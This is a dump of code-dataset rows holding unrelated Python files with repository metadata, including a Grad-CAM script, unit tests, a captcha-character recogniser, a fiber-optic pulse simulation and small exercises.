input_img = preprocess_image(img).to(args.device)
# If None, returns the map for the highest scoring category.
# Otherwise, targets the requested category.
target_category = None
grayscale_cam = grad_cam(input_img, target_category)
grayscale_cam = cv2.resize(grayscale_cam, (img.shape[1], img.shape[0]))
cam = show_cam_on_image(img, grayscale_cam)
gb_model = GuidedBackpropReLUModel(model=model)
gb = gb_model(input_img, target_category=target_category)
gb = gb.transpose((1, 2, 0))
cam_mask = cv2.merge([grayscale_cam, grayscale_cam, grayscale_cam])
cam_gb = deprocess_image(cam_mask * gb)
gb = deprocess_image(gb)
cv2.imwrite("grad_cam.jpg", cam)
cv2.imwrite('gb.jpg', gb)
cv2.imwrite('grad_cam_gb.jpg', cam_gb)
| 32.018957 | 86 | 0.657786 | import argparse
import cv2
import numpy as np
import torch
from torch.autograd import Function
from torchvision import models, transforms
class ModelWrapper:
def __init__(self, model, feature_module):
self.model = model
self.feature_module = feature_module
self.feature_gradients = None
self.feature_output = None
self.register_hooks()
def register_hooks(self):
target_layer = next(reversed(self.feature_module._modules))
target_layer = self.feature_module._modules[target_layer]
target_layer.register_backward_hook(self.save_gradient)
target_layer.register_forward_hook(self.save_output)
def save_gradient(self, module, grad_input, grad_output):
self.feature_gradients = grad_input[0]
def save_output(self, module, input, output):
self.feature_output = output
def __call__(self, x):
self.feature_gradients = None
self.feature_output = None
return self.model(x)
def preprocess_image(img):
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
preprocessing = transforms.Compose([
transforms.ToTensor(),
normalize,
])
return preprocessing(img.copy()).unsqueeze(0)
def show_cam_on_image(img, mask):
heatmap = cv2.applyColorMap(np.uint8(255 * mask), cv2.COLORMAP_JET)
heatmap = np.float32(heatmap) / 255
cam = heatmap + np.float32(img)
cam = cam / np.max(cam)
return np.uint8(255 * cam)
class GradCam:
def __init__(self, model, feature_module):
self.model = model
self.feature_module = feature_module
self.model.eval()
self.model_wrapper = ModelWrapper(self.model, self.feature_module)
def forward(self, input_img):
return self.model(input_img)
def __call__(self, input_img, target_category=None):
output = self.model_wrapper(input_img)
if target_category is None:
target_category = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][target_category] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
one_hot = one_hot.to(input_img.device)
one_hot = torch.sum(one_hot * output)
self.feature_module.zero_grad()
self.model.zero_grad()
one_hot.backward(retain_graph=True)
grads_val = self.model_wrapper.feature_gradients.cpu().data.numpy()
features = self.model_wrapper.feature_output
features = features[-1].cpu().data.numpy()
global_average_pooled_gradients = np.mean(grads_val, axis=(2, 3))[0, :]
cam = np.expand_dims(global_average_pooled_gradients, axis=(1, 2)) * features
cam = cam.sum(axis=0)
cam = np.maximum(cam, 0)
cam = cv2.resize(cam, input_img.shape[2:])
cam = cam - np.min(cam)
cam = cam / np.max(cam)
return cam
class GuidedBackpropReLU(Function):
@staticmethod
def forward(self, input_img):
positive_mask = (input_img > 0).type_as(input_img)
output = input_img * positive_mask
self.save_for_backward(positive_mask)
return output
@staticmethod
def backward(self, grad_output):
positive_mask_1 = self.saved_tensors[0]
positive_mask_2 = (grad_output > 0).type_as(grad_output)
grad_input = grad_output * positive_mask_1 * positive_mask_2
return grad_input
class GuidedBackpropReLUModel:
def __init__(self, model):
self.model = model
self.model.eval()
self.recursive_relu_apply(self.model)
def recursive_relu_apply(self, module_top):
# replace ReLU with GuidedBackpropReLU
for idx, module in module_top._modules.items():
self.recursive_relu_apply(module)
if module.__class__.__name__ == 'ReLU':
module_top._modules[idx] = GuidedBackpropReLU.apply
def __call__(self, input_img, target_category=None):
input_img.requires_grad = True
input_img.retain_grad()
output = self.model(input_img)
if target_category is None:
target_category = np.argmax(output.cpu().data.numpy())
one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
one_hot[0][target_category] = 1
one_hot = torch.from_numpy(one_hot).requires_grad_(True)
one_hot = one_hot.to(input_img.device)
one_hot = torch.sum(one_hot * output)
one_hot.backward()
output = input_img.grad.cpu().data.numpy()
output = output[0, :, :, :]
return output
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=str, default="cuda:0",
help='Use NVIDIA GPU acceleration')
parser.add_argument('--image-path', type=str, default='./examples/both.png',
help='Input image path')
args = parser.parse_args()
print(f"Device {args.device}")
return args
def deprocess_image(img):
""" see https://github.com/jacobgil/keras-grad-cam/blob/master/grad-cam.py#L65 """
img = img - np.mean(img)
img = img / (np.std(img) + 1e-5)
img = img * 0.1
img = img + 0.5
img = np.clip(img, 0, 1)
return np.uint8(img * 255)
if __name__ == '__main__':
""" python grad_cam.py <path_to_image>
1. Loads an image with opencv.
2. Preprocesses it for ResNet50 and converts to a pytorch variable.
3. Makes a forward pass to find the category index with the highest score,
and computes intermediate activations.
Makes the visualization. """
args = get_args()
model = models.resnet50(pretrained=True).to(args.device)
grad_cam = GradCam(model=model, feature_module=model.layer4)
img = cv2.imread(args.image_path, 1)
img = np.float32(img) / 255
# Opencv loads as BGR:
img = img[:, :, ::-1]
input_img = preprocess_image(img).to(args.device)
# If None, returns the map for the highest scoring category.
# Otherwise, targets the requested category.
target_category = None
grayscale_cam = grad_cam(input_img, target_category)
grayscale_cam = cv2.resize(grayscale_cam, (img.shape[1], img.shape[0]))
cam = show_cam_on_image(img, grayscale_cam)
gb_model = GuidedBackpropReLUModel(model=model)
gb = gb_model(input_img, target_category=target_category)
gb = gb.transpose((1, 2, 0))
cam_mask = cv2.merge([grayscale_cam, grayscale_cam, grayscale_cam])
cam_gb = deprocess_image(cam_mask * gb)
gb = deprocess_image(gb)
cv2.imwrite("grad_cam.jpg", cam)
cv2.imwrite('gb.jpg', gb)
cv2.imwrite('grad_cam_gb.jpg', cam_gb)
| 4,377 | 103 | 455 |
dbc09da959b036ed7a75ab06984c4b5d62ed3480 | 116 | py | Python | Python/URI PROBLEMAS/1011 - Esfera.py | guimaraesalves/material-python | d56b6b24ae35a67d394b43cb1ef4420805c7bd9b | [
"MIT"
] | null | null | null | Python/URI PROBLEMAS/1011 - Esfera.py | guimaraesalves/material-python | d56b6b24ae35a67d394b43cb1ef4420805c7bd9b | [
"MIT"
] | null | null | null | Python/URI PROBLEMAS/1011 - Esfera.py | guimaraesalves/material-python | d56b6b24ae35a67d394b43cb1ef4420805c7bd9b | [
"MIT"
] | null | null | null | raio = int(input())
pi = 3.14159
volume = float(4.0 * pi * (raio* raio * raio) / 3)
print("VOLUME = %0.3f" %volume)
| 23.2 | 50 | 0.586207 | raio = int(input())
pi = 3.14159
volume = float(4.0 * pi * (raio* raio * raio) / 3)
print("VOLUME = %0.3f" %volume)
| 0 | 0 | 0 |
53305877f3de42158e7f734b77f6b463c545f540 | 1,299 | py | Python | timsort/timsort_test.py | MercyFlesh/algorithms | d9bfe6c2506c2567632222abc878ebc5f1447aaf | [
"Apache-2.0"
] | 1 | 2021-06-13T11:45:18.000Z | 2021-06-13T11:45:18.000Z | timsort/timsort_test.py | MercyFlesh/algorithms | d9bfe6c2506c2567632222abc878ebc5f1447aaf | [
"Apache-2.0"
] | null | null | null | timsort/timsort_test.py | MercyFlesh/algorithms | d9bfe6c2506c2567632222abc878ebc5f1447aaf | [
"Apache-2.0"
] | null | null | null | import unittest
import matplotlib
import random
import time
import matplotlib.pyplot as plt
from timsort import Timsort
#test time sorting an array of n elements
#Checking the sorting of arrays in which there are less than 64 elements
#array sorting test greater than 64
if __name__ == "__main__":
unittest.main()
| 28.23913 | 94 | 0.568899 | import unittest
import matplotlib
import random
import time
import matplotlib.pyplot as plt
from timsort import Timsort
class timsortTest(unittest.TestCase):
#test time sorting an array of n elements
def test_time_froze(self):
data = []
count = 10000
for _ in range(count):
data.append(random.randint(0, 30000))
start_time = time.perf_counter()
Timsort(data)
print(f"time froze sort {count} elements: {time.perf_counter() - start_time} sec.\n")
#Checking the sorting of arrays in which there are less than 64 elements
def test_arr_less_64symb(self):
test_cases = (([8, 1, 7, 4, 0], [0, 1, 4, 7, 8]), ([], []))
for ex, tr in test_cases:
with self.subTest(n=ex):
self.assertEqual(Timsort(ex), tr)
#array sorting test greater than 64
def test_greater64(self):
data = []
for _ in range(100):
data.append(random.randint(0, 10000))
Timsort(data)
for i in range(len(data) - 1):
with self.subTest(value_1=data[i], value_2=data[i+1]):
self.assertTrue(data[i] <= data[i + 1])
if __name__ == "__main__":
unittest.main()
| 804 | 16 | 106 |
36db0b5c6de0ffb70fd5bd57eceeb1e2a475fc0e | 3,831 | py | Python | tests/unit/test_report_options.py | Anselmoo/pandas-profiling | 41ee043175eaa1c5b21fcba178110331adcad713 | [
"MIT"
] | 736 | 2016-01-14T03:36:03.000Z | 2018-01-06T00:56:33.000Z | tests/unit/test_report_options.py | Anselmoo/pandas-profiling | 41ee043175eaa1c5b21fcba178110331adcad713 | [
"MIT"
] | 72 | 2016-01-29T12:08:04.000Z | 2018-01-06T11:18:44.000Z | tests/unit/test_report_options.py | sthagen/pandas-profiling-pandas-profiling | 6fd50055126ebebf74c92c6f908f54fa7cd9c816 | [
"MIT"
] | 108 | 2016-01-14T11:48:18.000Z | 2018-01-02T13:35:10.000Z | import pandas as pd
import pytest
from pandas_profiling import ProfileReport
# Generating dummy data
dummy_bool_data = generate_cat_data_series(pd.Series({True: 82, False: 36}))
dummy_cat_data = generate_cat_data_series(
pd.Series(
{
"Amadeou_plus": 75,
"Beta_front": 50,
"Calciumus": 20,
"Dimitrius": 1,
"esperagus_anonymoliumus": 75,
"FrigaTTTBrigde_Writap": 50,
"galgarartiy": 30,
"He": 1,
"I": 10,
"JimISGODDOT": 1,
}
)
)
# Unit tests
# - Test category frequency plots general options
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
# - Test category frequency plots color options
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
# - Test exceptions
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
| 33.902655 | 88 | 0.683895 | import pandas as pd
import pytest
from pandas_profiling import ProfileReport
# Generating dummy data
def generate_cat_data_series(categories):
dummy_data = []
for cat, i in categories.items():
dummy_data.extend([cat, ] * i) # fmt: skip
return pd.DataFrame({"dummy_cat": dummy_data})
dummy_bool_data = generate_cat_data_series(pd.Series({True: 82, False: 36}))
dummy_cat_data = generate_cat_data_series(
pd.Series(
{
"Amadeou_plus": 75,
"Beta_front": 50,
"Calciumus": 20,
"Dimitrius": 1,
"esperagus_anonymoliumus": 75,
"FrigaTTTBrigde_Writap": 50,
"galgarartiy": 30,
"He": 1,
"I": 10,
"JimISGODDOT": 1,
}
)
)
def generate_report(data):
return ProfileReport(
df=data,
progress_bar=False,
samples=None,
correlations=None,
missing_diagrams=None,
duplicates=None,
interactions=None,
)
# Unit tests
# - Test category frequency plots general options
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
def test_deactivated_cat_frequency_plot(data, plot_type):
profile = generate_report(data)
profile.config.plot.cat_freq.show = False
profile.config.plot.cat_freq.type = plot_type
html_report = profile.to_html()
assert "Category Frequency Plot" not in html_report
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
def test_cat_frequency_default_barh_plot(data):
profile = generate_report(data)
html_report = profile.to_html()
assert "Category Frequency Plot" in html_report
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
def test_cat_frequency_pie_plot(data):
profile = generate_report(data)
profile.config.plot.cat_freq.type = "pie"
html_report = profile.to_html()
assert "pie" in html_report
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
def test_max_nuique_smaller_than_unique_cats(plot_type):
profile = generate_report(dummy_cat_data)
profile.config.plot.cat_freq.max_unique = 2 # smaller than the number of categories
profile.config.plot.cat_freq.type = plot_type
html_report = profile.to_html()
assert "Category Frequency Plot" not in html_report
# - Test category frequency plots color options
@pytest.mark.parametrize("plot_type", ["bar", "pie"])
def test_cat_frequency_with_custom_colors(plot_type):
test_data = generate_cat_data_series(pd.Series({"A": 10, "B": 10, "C": 10}))
custom_colors = {"gold": "#ffd700", "b": "#0000ff", "#FF796C": "#ff796c"}
profile = generate_report(test_data)
profile.config.plot.cat_freq.colors = list(custom_colors.keys())
profile.config.plot.cat_freq.type = plot_type
html_report = profile.to_html()
for c, hex_code in custom_colors.items():
assert f"fill: {hex_code}" in html_report, f"Missing color code of {c}"
def test_more_cats_than_colors():
test_data = generate_cat_data_series(
pd.Series({"A": 10, "B": 10, "C": 10, "D": 10})
)
custom_colors = {"gold": "#ffd700", "b": "#0000ff", "#FF796C": "#ff796c"}
profile = generate_report(test_data)
profile.config.plot.cat_freq.colors = list(custom_colors.keys())
html_report = profile.to_html()
assert "Category Frequency Plot" in html_report # just check that it worked
# - Test exceptions
@pytest.mark.parametrize("data", [dummy_bool_data, dummy_cat_data], ids=["bool", "cat"])
def test_exception_with_invalid_cat_freq_type(data):
profile = generate_report(data)
profile.config.plot.cat_freq.type = "box"
with pytest.raises(ValueError):
profile.to_html()
| 2,393 | 0 | 200 |
19c0dcfcf71c786d0e728ea04aa90bc833d7ee70 | 353 | py | Python | kubernetes_typed/client/models/v1_subject_access_review_status.py | nikhiljha/kubernetes-typed | 4f4b969aa400c88306f92560e56bda6d19b2a895 | [
"Apache-2.0"
] | 22 | 2020-12-10T13:06:02.000Z | 2022-02-13T21:58:15.000Z | kubernetes_typed/client/models/v1_subject_access_review_status.py | nikhiljha/kubernetes-typed | 4f4b969aa400c88306f92560e56bda6d19b2a895 | [
"Apache-2.0"
] | 4 | 2021-03-08T07:06:12.000Z | 2022-03-29T23:41:45.000Z | kubernetes_typed/client/models/v1_subject_access_review_status.py | nikhiljha/kubernetes-typed | 4f4b969aa400c88306f92560e56bda6d19b2a895 | [
"Apache-2.0"
] | 2 | 2021-09-05T19:18:28.000Z | 2022-03-14T02:56:17.000Z | # Code generated by `typeddictgen`. DO NOT EDIT.
"""V1SubjectAccessReviewStatusDict generated type."""
from typing import TypedDict
V1SubjectAccessReviewStatusDict = TypedDict(
"V1SubjectAccessReviewStatusDict",
{
"allowed": bool,
"denied": bool,
"evaluationError": str,
"reason": str,
},
total=False,
)
| 23.533333 | 53 | 0.66289 | # Code generated by `typeddictgen`. DO NOT EDIT.
"""V1SubjectAccessReviewStatusDict generated type."""
from typing import TypedDict
V1SubjectAccessReviewStatusDict = TypedDict(
"V1SubjectAccessReviewStatusDict",
{
"allowed": bool,
"denied": bool,
"evaluationError": str,
"reason": str,
},
total=False,
)
| 0 | 0 | 0 |
b544a2e462706d7df03ff44b7026a01ff5eb4a79 | 793 | py | Python | frontend/GUI/ROOT_AND_MAIN/setup.py | Lucianofc138/smart_scheduler_usm | 0ac50d71cfd1947b889a9551c31a3a67ecabfb88 | [
"MIT"
] | null | null | null | frontend/GUI/ROOT_AND_MAIN/setup.py | Lucianofc138/smart_scheduler_usm | 0ac50d71cfd1947b889a9551c31a3a67ecabfb88 | [
"MIT"
] | null | null | null | frontend/GUI/ROOT_AND_MAIN/setup.py | Lucianofc138/smart_scheduler_usm | 0ac50d71cfd1947b889a9551c31a3a67ecabfb88 | [
"MIT"
] | null | null | null | from ROOT_AND_MAIN.widgets import Root_and_main
import ROOT_AND_MAIN.USER_WINDOW.setup as user_window
import ROOT_AND_MAIN.SCHEDULE_WINDOW.setup as schedule_window
import ROOT_AND_MAIN.SUBJECT_WINDOW.setup as subject_window | 41.736842 | 74 | 0.828499 | from ROOT_AND_MAIN.widgets import Root_and_main
import ROOT_AND_MAIN.USER_WINDOW.setup as user_window
import ROOT_AND_MAIN.SCHEDULE_WINDOW.setup as schedule_window
import ROOT_AND_MAIN.SUBJECT_WINDOW.setup as subject_window
def setup():
root_and_main_container = Root_and_main()
window1 = user_window.setup(root_and_main_container.window_manager)
window2 = subject_window.setup(root_and_main_container.window_manager)
window3 = subject_window.setup(root_and_main_container.window_manager)
root_and_main_container.window_manager.add(window1, text="Usuario")
root_and_main_container.window_manager.add(window2, text="Ramos")
root_and_main_container.window_manager.add(window3, text="Horarios")
root_and_main_container.grid()
root_and_main_container.run() | 546 | 0 | 23 |
03499f5a2ea02a4b486f32f1e63da88f63254da4 | 195 | py | Python | opinionated_reporting/apps.py | jobelenus/opinionated-reporting | 7b41f479e7aa8d9bd9a374f0799df92d430b7a6f | [
"MIT"
] | null | null | null | opinionated_reporting/apps.py | jobelenus/opinionated-reporting | 7b41f479e7aa8d9bd9a374f0799df92d430b7a6f | [
"MIT"
] | null | null | null | opinionated_reporting/apps.py | jobelenus/opinionated-reporting | 7b41f479e7aa8d9bd9a374f0799df92d430b7a6f | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 24.375 | 44 | 0.779487 | from django.apps import AppConfig
class OpinionatedReportingConfig(AppConfig):
name = 'opinionated_reporting'
verbose_name = "Opinionated Reporting"
label = 'opinionated_reporting'
| 0 | 137 | 23 |
387e5fec290d4d08ed77489ba1f209a4ea4dd5b0 | 3,411 | py | Python | cap_extra/recognise.py | Apkawa/simple-captcha-ocr-opencv | b0c20c8cac75feac1d10b21b99629ac5d66cd744 | [
"MIT"
] | 1 | 2015-12-29T09:52:58.000Z | 2015-12-29T09:52:58.000Z | cap_extra/recognise.py | Apkawa/simple-captcha-ocr-opencv | b0c20c8cac75feac1d10b21b99629ac5d66cd744 | [
"MIT"
] | null | null | null | cap_extra/recognise.py | Apkawa/simple-captcha-ocr-opencv | b0c20c8cac75feac1d10b21b99629ac5d66cd744 | [
"MIT"
] | null | null | null | """
Copyright 2011 Dmitry Nikulin
This file is part of Captchure.
Captchure is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Captchure is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Captchure. If not, see <http://www.gnu.org/licenses/>.
"""
import cv
from pyfann import libfann
from cvext import copyTo
from general import argmax
| 33.441176 | 85 | 0.625916 | """
Copyright 2011 Dmitry Nikulin
This file is part of Captchure.
Captchure is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Captchure is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Captchure. If not, see <http://www.gnu.org/licenses/>.
"""
import cv
from pyfann import libfann
from cvext import copyTo
from general import argmax
def loadAnn(ann_file):
ann = libfann.neural_net()
ann.create_from_file(ann_file)
return ann
def flattenImage(image):
lst = []
for y in range(image.height):
for x in range(image.width):
n = image[y, x] / 127.5 - 1.0
lst.append(n)
return lst
def resizeNaive(image, size):
result = cv.CreateImage(size, cv.IPL_DEPTH_8U, 1)
cv.Resize(image, result, cv.CV_INTER_CUBIC)
return result
def resizeProp(image, (segW, segH)):
result = cv.CreateImage((segW, segH), image.depth, image.nChannels)
cv.Zero(result)
if image.width <= segW and image.height <= segH:
offW = (segW - image.width) / 2
offH = (segH - image.height) / 2
copyTo(image, result, (offW, offH), None)
else:
scaleW = float(segW) / float(image.width)
newH = image.height * scaleW
if newH <= segH:
offH = (segH - newH) / 2.0
rect = (0, int(offH), segW, int(newH))
else:
scaleH = float(segH) / float(image.height)
newW = image.width * scaleH
offW = (segW - newW) / 2.0
rect = (int(offW), 0, int(newW), segH)
cv.SetImageROI(result, rect)
cv.Resize(image, result, cv.CV_INTER_CUBIC)
cv.ResetImageROI(result)
return result
def resizeFit(image, (segW, segH)):
result = cv.CreateImage((segW, segH), image.depth, image.nChannels)
cv.Zero(result)
if image.width > segW:
if image.height > segH:
cv.Resize(image, result, cv.CV_INTER_CUBIC)
else:
temp = cv.CreateImage((segW, image.height), image.depth, image.nChannels)
cv.Resize(image, temp, cv.CV_INTER_CUBIC)
offH = (segH - image.height) / 2
copyTo(temp, result, (0, offH), None)
else:
if image.height > segH:
temp = cv.CreateImage((image.width, segH), image.depth, image.nChannels)
cv.Resize(image, temp, cv.CV_INTER_CUBIC)
offW = (segW - image.width) / 2
copyTo(temp, result, (offW, 0), None)
else:
offW = (segW - image.width) / 2
offH = (segH - image.height) / 2
copyTo(image, result, (offW, offH), None)
return result
def recogniseChar(image, ann, charset):
result = ann.run(flattenImage(image))
return charset[argmax(result)]
def defaultRecognise(segments, addr, extras, ann, size, charset, resizer):
segments = map(lambda seg: resizer(seg, size), segments)
return "".join(map(lambda seg: recogniseChar(seg, ann, charset), segments)) | 2,431 | 0 | 161 |
2786aa1d3ee81948426359f764eacbd85e2371ee | 128 | py | Python | src/main.py | pffijt/canopen-project | 08922a7e2ee7ee3f76b0a15e14df40e338c597da | [
"MIT"
] | null | null | null | src/main.py | pffijt/canopen-project | 08922a7e2ee7ee3f76b0a15e14df40e338c597da | [
"MIT"
] | null | null | null | src/main.py | pffijt/canopen-project | 08922a7e2ee7ee3f76b0a15e14df40e338c597da | [
"MIT"
] | null | null | null | import canopen
network = canopen.Network()
network.connect(channel='can0', bustype='socketcan')
node = network.add_node(6, '') | 21.333333 | 52 | 0.742188 | import canopen
network = canopen.Network()
network.connect(channel='can0', bustype='socketcan')
node = network.add_node(6, '') | 0 | 0 | 0 |
494781a2b687058b1ee71c63ce31988e72495630 | 1,950 | py | Python | tests/direct_modulation.py | curio-sitas/fiber-nlse | 41cda9a85705a5a0a29db1c7ab0cbcd4cca35674 | [
"MIT"
] | null | null | null | tests/direct_modulation.py | curio-sitas/fiber-nlse | 41cda9a85705a5a0a29db1c7ab0cbcd4cca35674 | [
"MIT"
] | null | null | null | tests/direct_modulation.py | curio-sitas/fiber-nlse | 41cda9a85705a5a0a29db1c7ab0cbcd4cca35674 | [
"MIT"
] | null | null | null | #%%
import numpy as np
import sys
import pylab as plt
sys.path.append('../')
from fiber_nlse.fiber_nlse import *
# Physical units & constants
nm = 1e-9
ps = 1e-12
km = 1e3
mW = 1e-3
GHz = 1e9
Thz = 1e12
m = 1
W = 1
c = 3e8
# Simulation metrics
N_t = 2000
N_z = 1000
# Physical parameters
# Source
T = 500*ps
λ = 1550 * nm
P0 = 490 * mW
f0 = 10 * GHz
# Fiber
α = 0.046 / km
γ = 10.1 / W / km
γ2 = 1.1 / W / km
L2 = 5000 * m
L = 0 * m
D = -0.8 * ps / nm /km
D2 = - 20 * ps / nm / km
β2 = - D*λ**2/(2*np.pi*c) # dispersion
β2_2 = - D2*λ**2/(2*np.pi*c) # dispersion
τ0 = 10*ps # pulse FWHM
fib = Fiber(L, α, β2, γ) # create fiber
sim = SegmentSimulation(fib, N_z, N_t, direct_modulation, T) # simulate on the fiber portion
t, U = sim.run() # perform simulation
Pmatrix = np.abs(U)**2
fib2 = Fiber(L2, α, β2_2, γ2)
sim2 = SegmentSimulation(fib2, N_z, N_t, lambda x : U[-1,:], T) # simulate on the fiber portion
t, U2 = sim2.run() # perform simulation
Pmatrix = np.abs(np.vstack((U, U2)))**2/mW # compute optical power matrix
#%%
plt.figure()
plt.title(r'Pulse progagation with dipsersion')
plt.imshow(Pmatrix, aspect='auto', extent=[-T/2/ps, T/2/ps, L/km, 0])
plt.tight_layout()
plt.xlabel(r'Local time [ns]')
plt.ylabel(r'Distance [km]')
cb = plt.colorbar()
cb.set_label(r'Optical power [mW]')
plt.show()
# %%
plt.figure()
plt.title(r'Pulse propagation with dispersion')
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[0,:])))), label=r'Pulse at z={:.2f} km'.format(0))
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[-1,:])))), label=r'Pulse at z={:.2f} km'.format(L/km))
plt.grid()
plt.legend()
plt.ylabel(r'Optical phase [rad]')
plt.xlabel(r'Local time [ns]')
plt.tight_layout()
plt.show()
# %%
plt.plot(Pmatrix[-1,:])
plt.plot(Pmatrix[0,:])
plt.show()
# %%
| 20.744681 | 116 | 0.637949 | #%%
import numpy as np
import sys
import pylab as plt
sys.path.append('../')
from fiber_nlse.fiber_nlse import *
# Physical units & constants
nm = 1e-9
ps = 1e-12
km = 1e3
mW = 1e-3
GHz = 1e9
Thz = 1e12
m = 1
W = 1
c = 3e8
# Simulation metrics
N_t = 2000
N_z = 1000
# Physical parameters
# Source
T = 500*ps
λ = 1550 * nm
P0 = 490 * mW
f0 = 10 * GHz
# Fiber
α = 0.046 / km
γ = 10.1 / W / km
γ2 = 1.1 / W / km
L2 = 5000 * m
L = 0 * m
D = -0.8 * ps / nm /km
D2 = - 20 * ps / nm / km
β2 = - D*λ**2/(2*np.pi*c) # dispersion
β2_2 = - D2*λ**2/(2*np.pi*c) # dispersion
τ0 = 10*ps # pulse FWHM
def gaussian_pulse(t):
return np.sqrt(P0)*np.exp(-((t-T/2)/(2*τ0))**2)
def direct_modulation(t):
return np.sqrt(P0)*np.cos(2*np.pi*f0*t)
fib = Fiber(L, α, β2, γ) # create fiber
sim = SegmentSimulation(fib, N_z, N_t, direct_modulation, T) # simulate on the fiber portion
t, U = sim.run() # perform simulation
Pmatrix = np.abs(U)**2
fib2 = Fiber(L2, α, β2_2, γ2)
sim2 = SegmentSimulation(fib2, N_z, N_t, lambda x : U[-1,:], T) # simulate on the fiber portion
t, U2 = sim2.run() # perform simulation
Pmatrix = np.abs(np.vstack((U, U2)))**2/mW # compute optical power matrix
#%%
plt.figure()
plt.title(r'Pulse progagation with dipsersion')
plt.imshow(Pmatrix, aspect='auto', extent=[-T/2/ps, T/2/ps, L/km, 0])
plt.tight_layout()
plt.xlabel(r'Local time [ns]')
plt.ylabel(r'Distance [km]')
cb = plt.colorbar()
cb.set_label(r'Optical power [mW]')
plt.show()
# %%
plt.figure()
plt.title(r'Pulse propagation with dispersion')
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[0,:])))), label=r'Pulse at z={:.2f} km'.format(0))
plt.plot(t/ps,np.unwrap(np.angle(np.fft.fftshift(np.fft.fft(U[-1,:])))), label=r'Pulse at z={:.2f} km'.format(L/km))
plt.grid()
plt.legend()
plt.ylabel(r'Optical phase [rad]')
plt.xlabel(r'Local time [ns]')
plt.tight_layout()
plt.show()
# %%
plt.plot(Pmatrix[-1,:])
plt.plot(Pmatrix[0,:])
plt.show()
# %%
| 102 | 0 | 46 |
0c92987e9c275e624130aae8842a6cf51f12a3ef | 1,022 | py | Python | ProgramFlow/dictandsets/atrocias_hash.py | kumarvgit/python3 | 318c5e7503fafc9c60082fa123e2930bd82a4ec9 | [
"MIT"
] | null | null | null | ProgramFlow/dictandsets/atrocias_hash.py | kumarvgit/python3 | 318c5e7503fafc9c60082fa123e2930bd82a4ec9 | [
"MIT"
] | null | null | null | ProgramFlow/dictandsets/atrocias_hash.py | kumarvgit/python3 | 318c5e7503fafc9c60082fa123e2930bd82a4ec9 | [
"MIT"
] | null | null | null | data = [
("orange", "a sweet, orange, citrus fruit"),
("apple", "good for making cider"),
("lemon", "a sour, yellow citrus fruit"),
("grape", "a small, sweet fruit growing in bunches"),
("melon", "sweet and juicy"),
]
# Convert to ASCII chars
# print(ord("a"))
# print(ord("b"))
# print(ord("z"))
def simple_hash(s: str) -> int:
"""A ridiculously simple hashing function"""
basic_hash = ord(s[0])
return basic_hash % 10
def get(k: str) -> int:
"""
return value of the kry
:param k: the key
:return: `int if found else None`
"""
hash_code = simple_hash(k)
if values[hash_code]:
return values[hash_code]
else:
return None
for key, value in data:
h = simple_hash(key)
# h = hash(key)
print(key, h)
keys = [""] * 10
values = keys.copy()
for key, value in data:
h = simple_hash(key)
print(key, h)
# add in hash keys
keys[h] = key
values[h] = value
print(keys)
print(values)
print()
print(get('lemon'))
| 18.25 | 57 | 0.581213 | data = [
("orange", "a sweet, orange, citrus fruit"),
("apple", "good for making cider"),
("lemon", "a sour, yellow citrus fruit"),
("grape", "a small, sweet fruit growing in bunches"),
("melon", "sweet and juicy"),
]
# Convert to ASCII chars
# print(ord("a"))
# print(ord("b"))
# print(ord("z"))
def simple_hash(s: str) -> int:
"""A ridiculously simple hashing function"""
basic_hash = ord(s[0])
return basic_hash % 10
def get(k: str) -> int:
"""
return value of the kry
:param k: the key
:return: `int if found else None`
"""
hash_code = simple_hash(k)
if values[hash_code]:
return values[hash_code]
else:
return None
for key, value in data:
h = simple_hash(key)
# h = hash(key)
print(key, h)
keys = [""] * 10
values = keys.copy()
for key, value in data:
h = simple_hash(key)
print(key, h)
# add in hash keys
keys[h] = key
values[h] = value
print(keys)
print(values)
print()
print(get('lemon'))
| 0 | 0 | 0 |
8878ea06ed16bfc83674cc952a9a3d0d1d2ecfa0 | 198,392 | py | Python | temporary/ferc_util_prep.py | mdbartos/RIPS | ab654138ccdcd8cb7c4ab53092132e0156812e95 | [
"MIT"
] | 1 | 2021-04-02T03:05:55.000Z | 2021-04-02T03:05:55.000Z | temporary/ferc_util_prep.py | mdbartos/RIPS | ab654138ccdcd8cb7c4ab53092132e0156812e95 | [
"MIT"
] | 2 | 2015-05-13T23:35:43.000Z | 2015-05-22T00:51:23.000Z | temporary/ferc_util_prep.py | mdbartos/RIPS | ab654138ccdcd8cb7c4ab53092132e0156812e95 | [
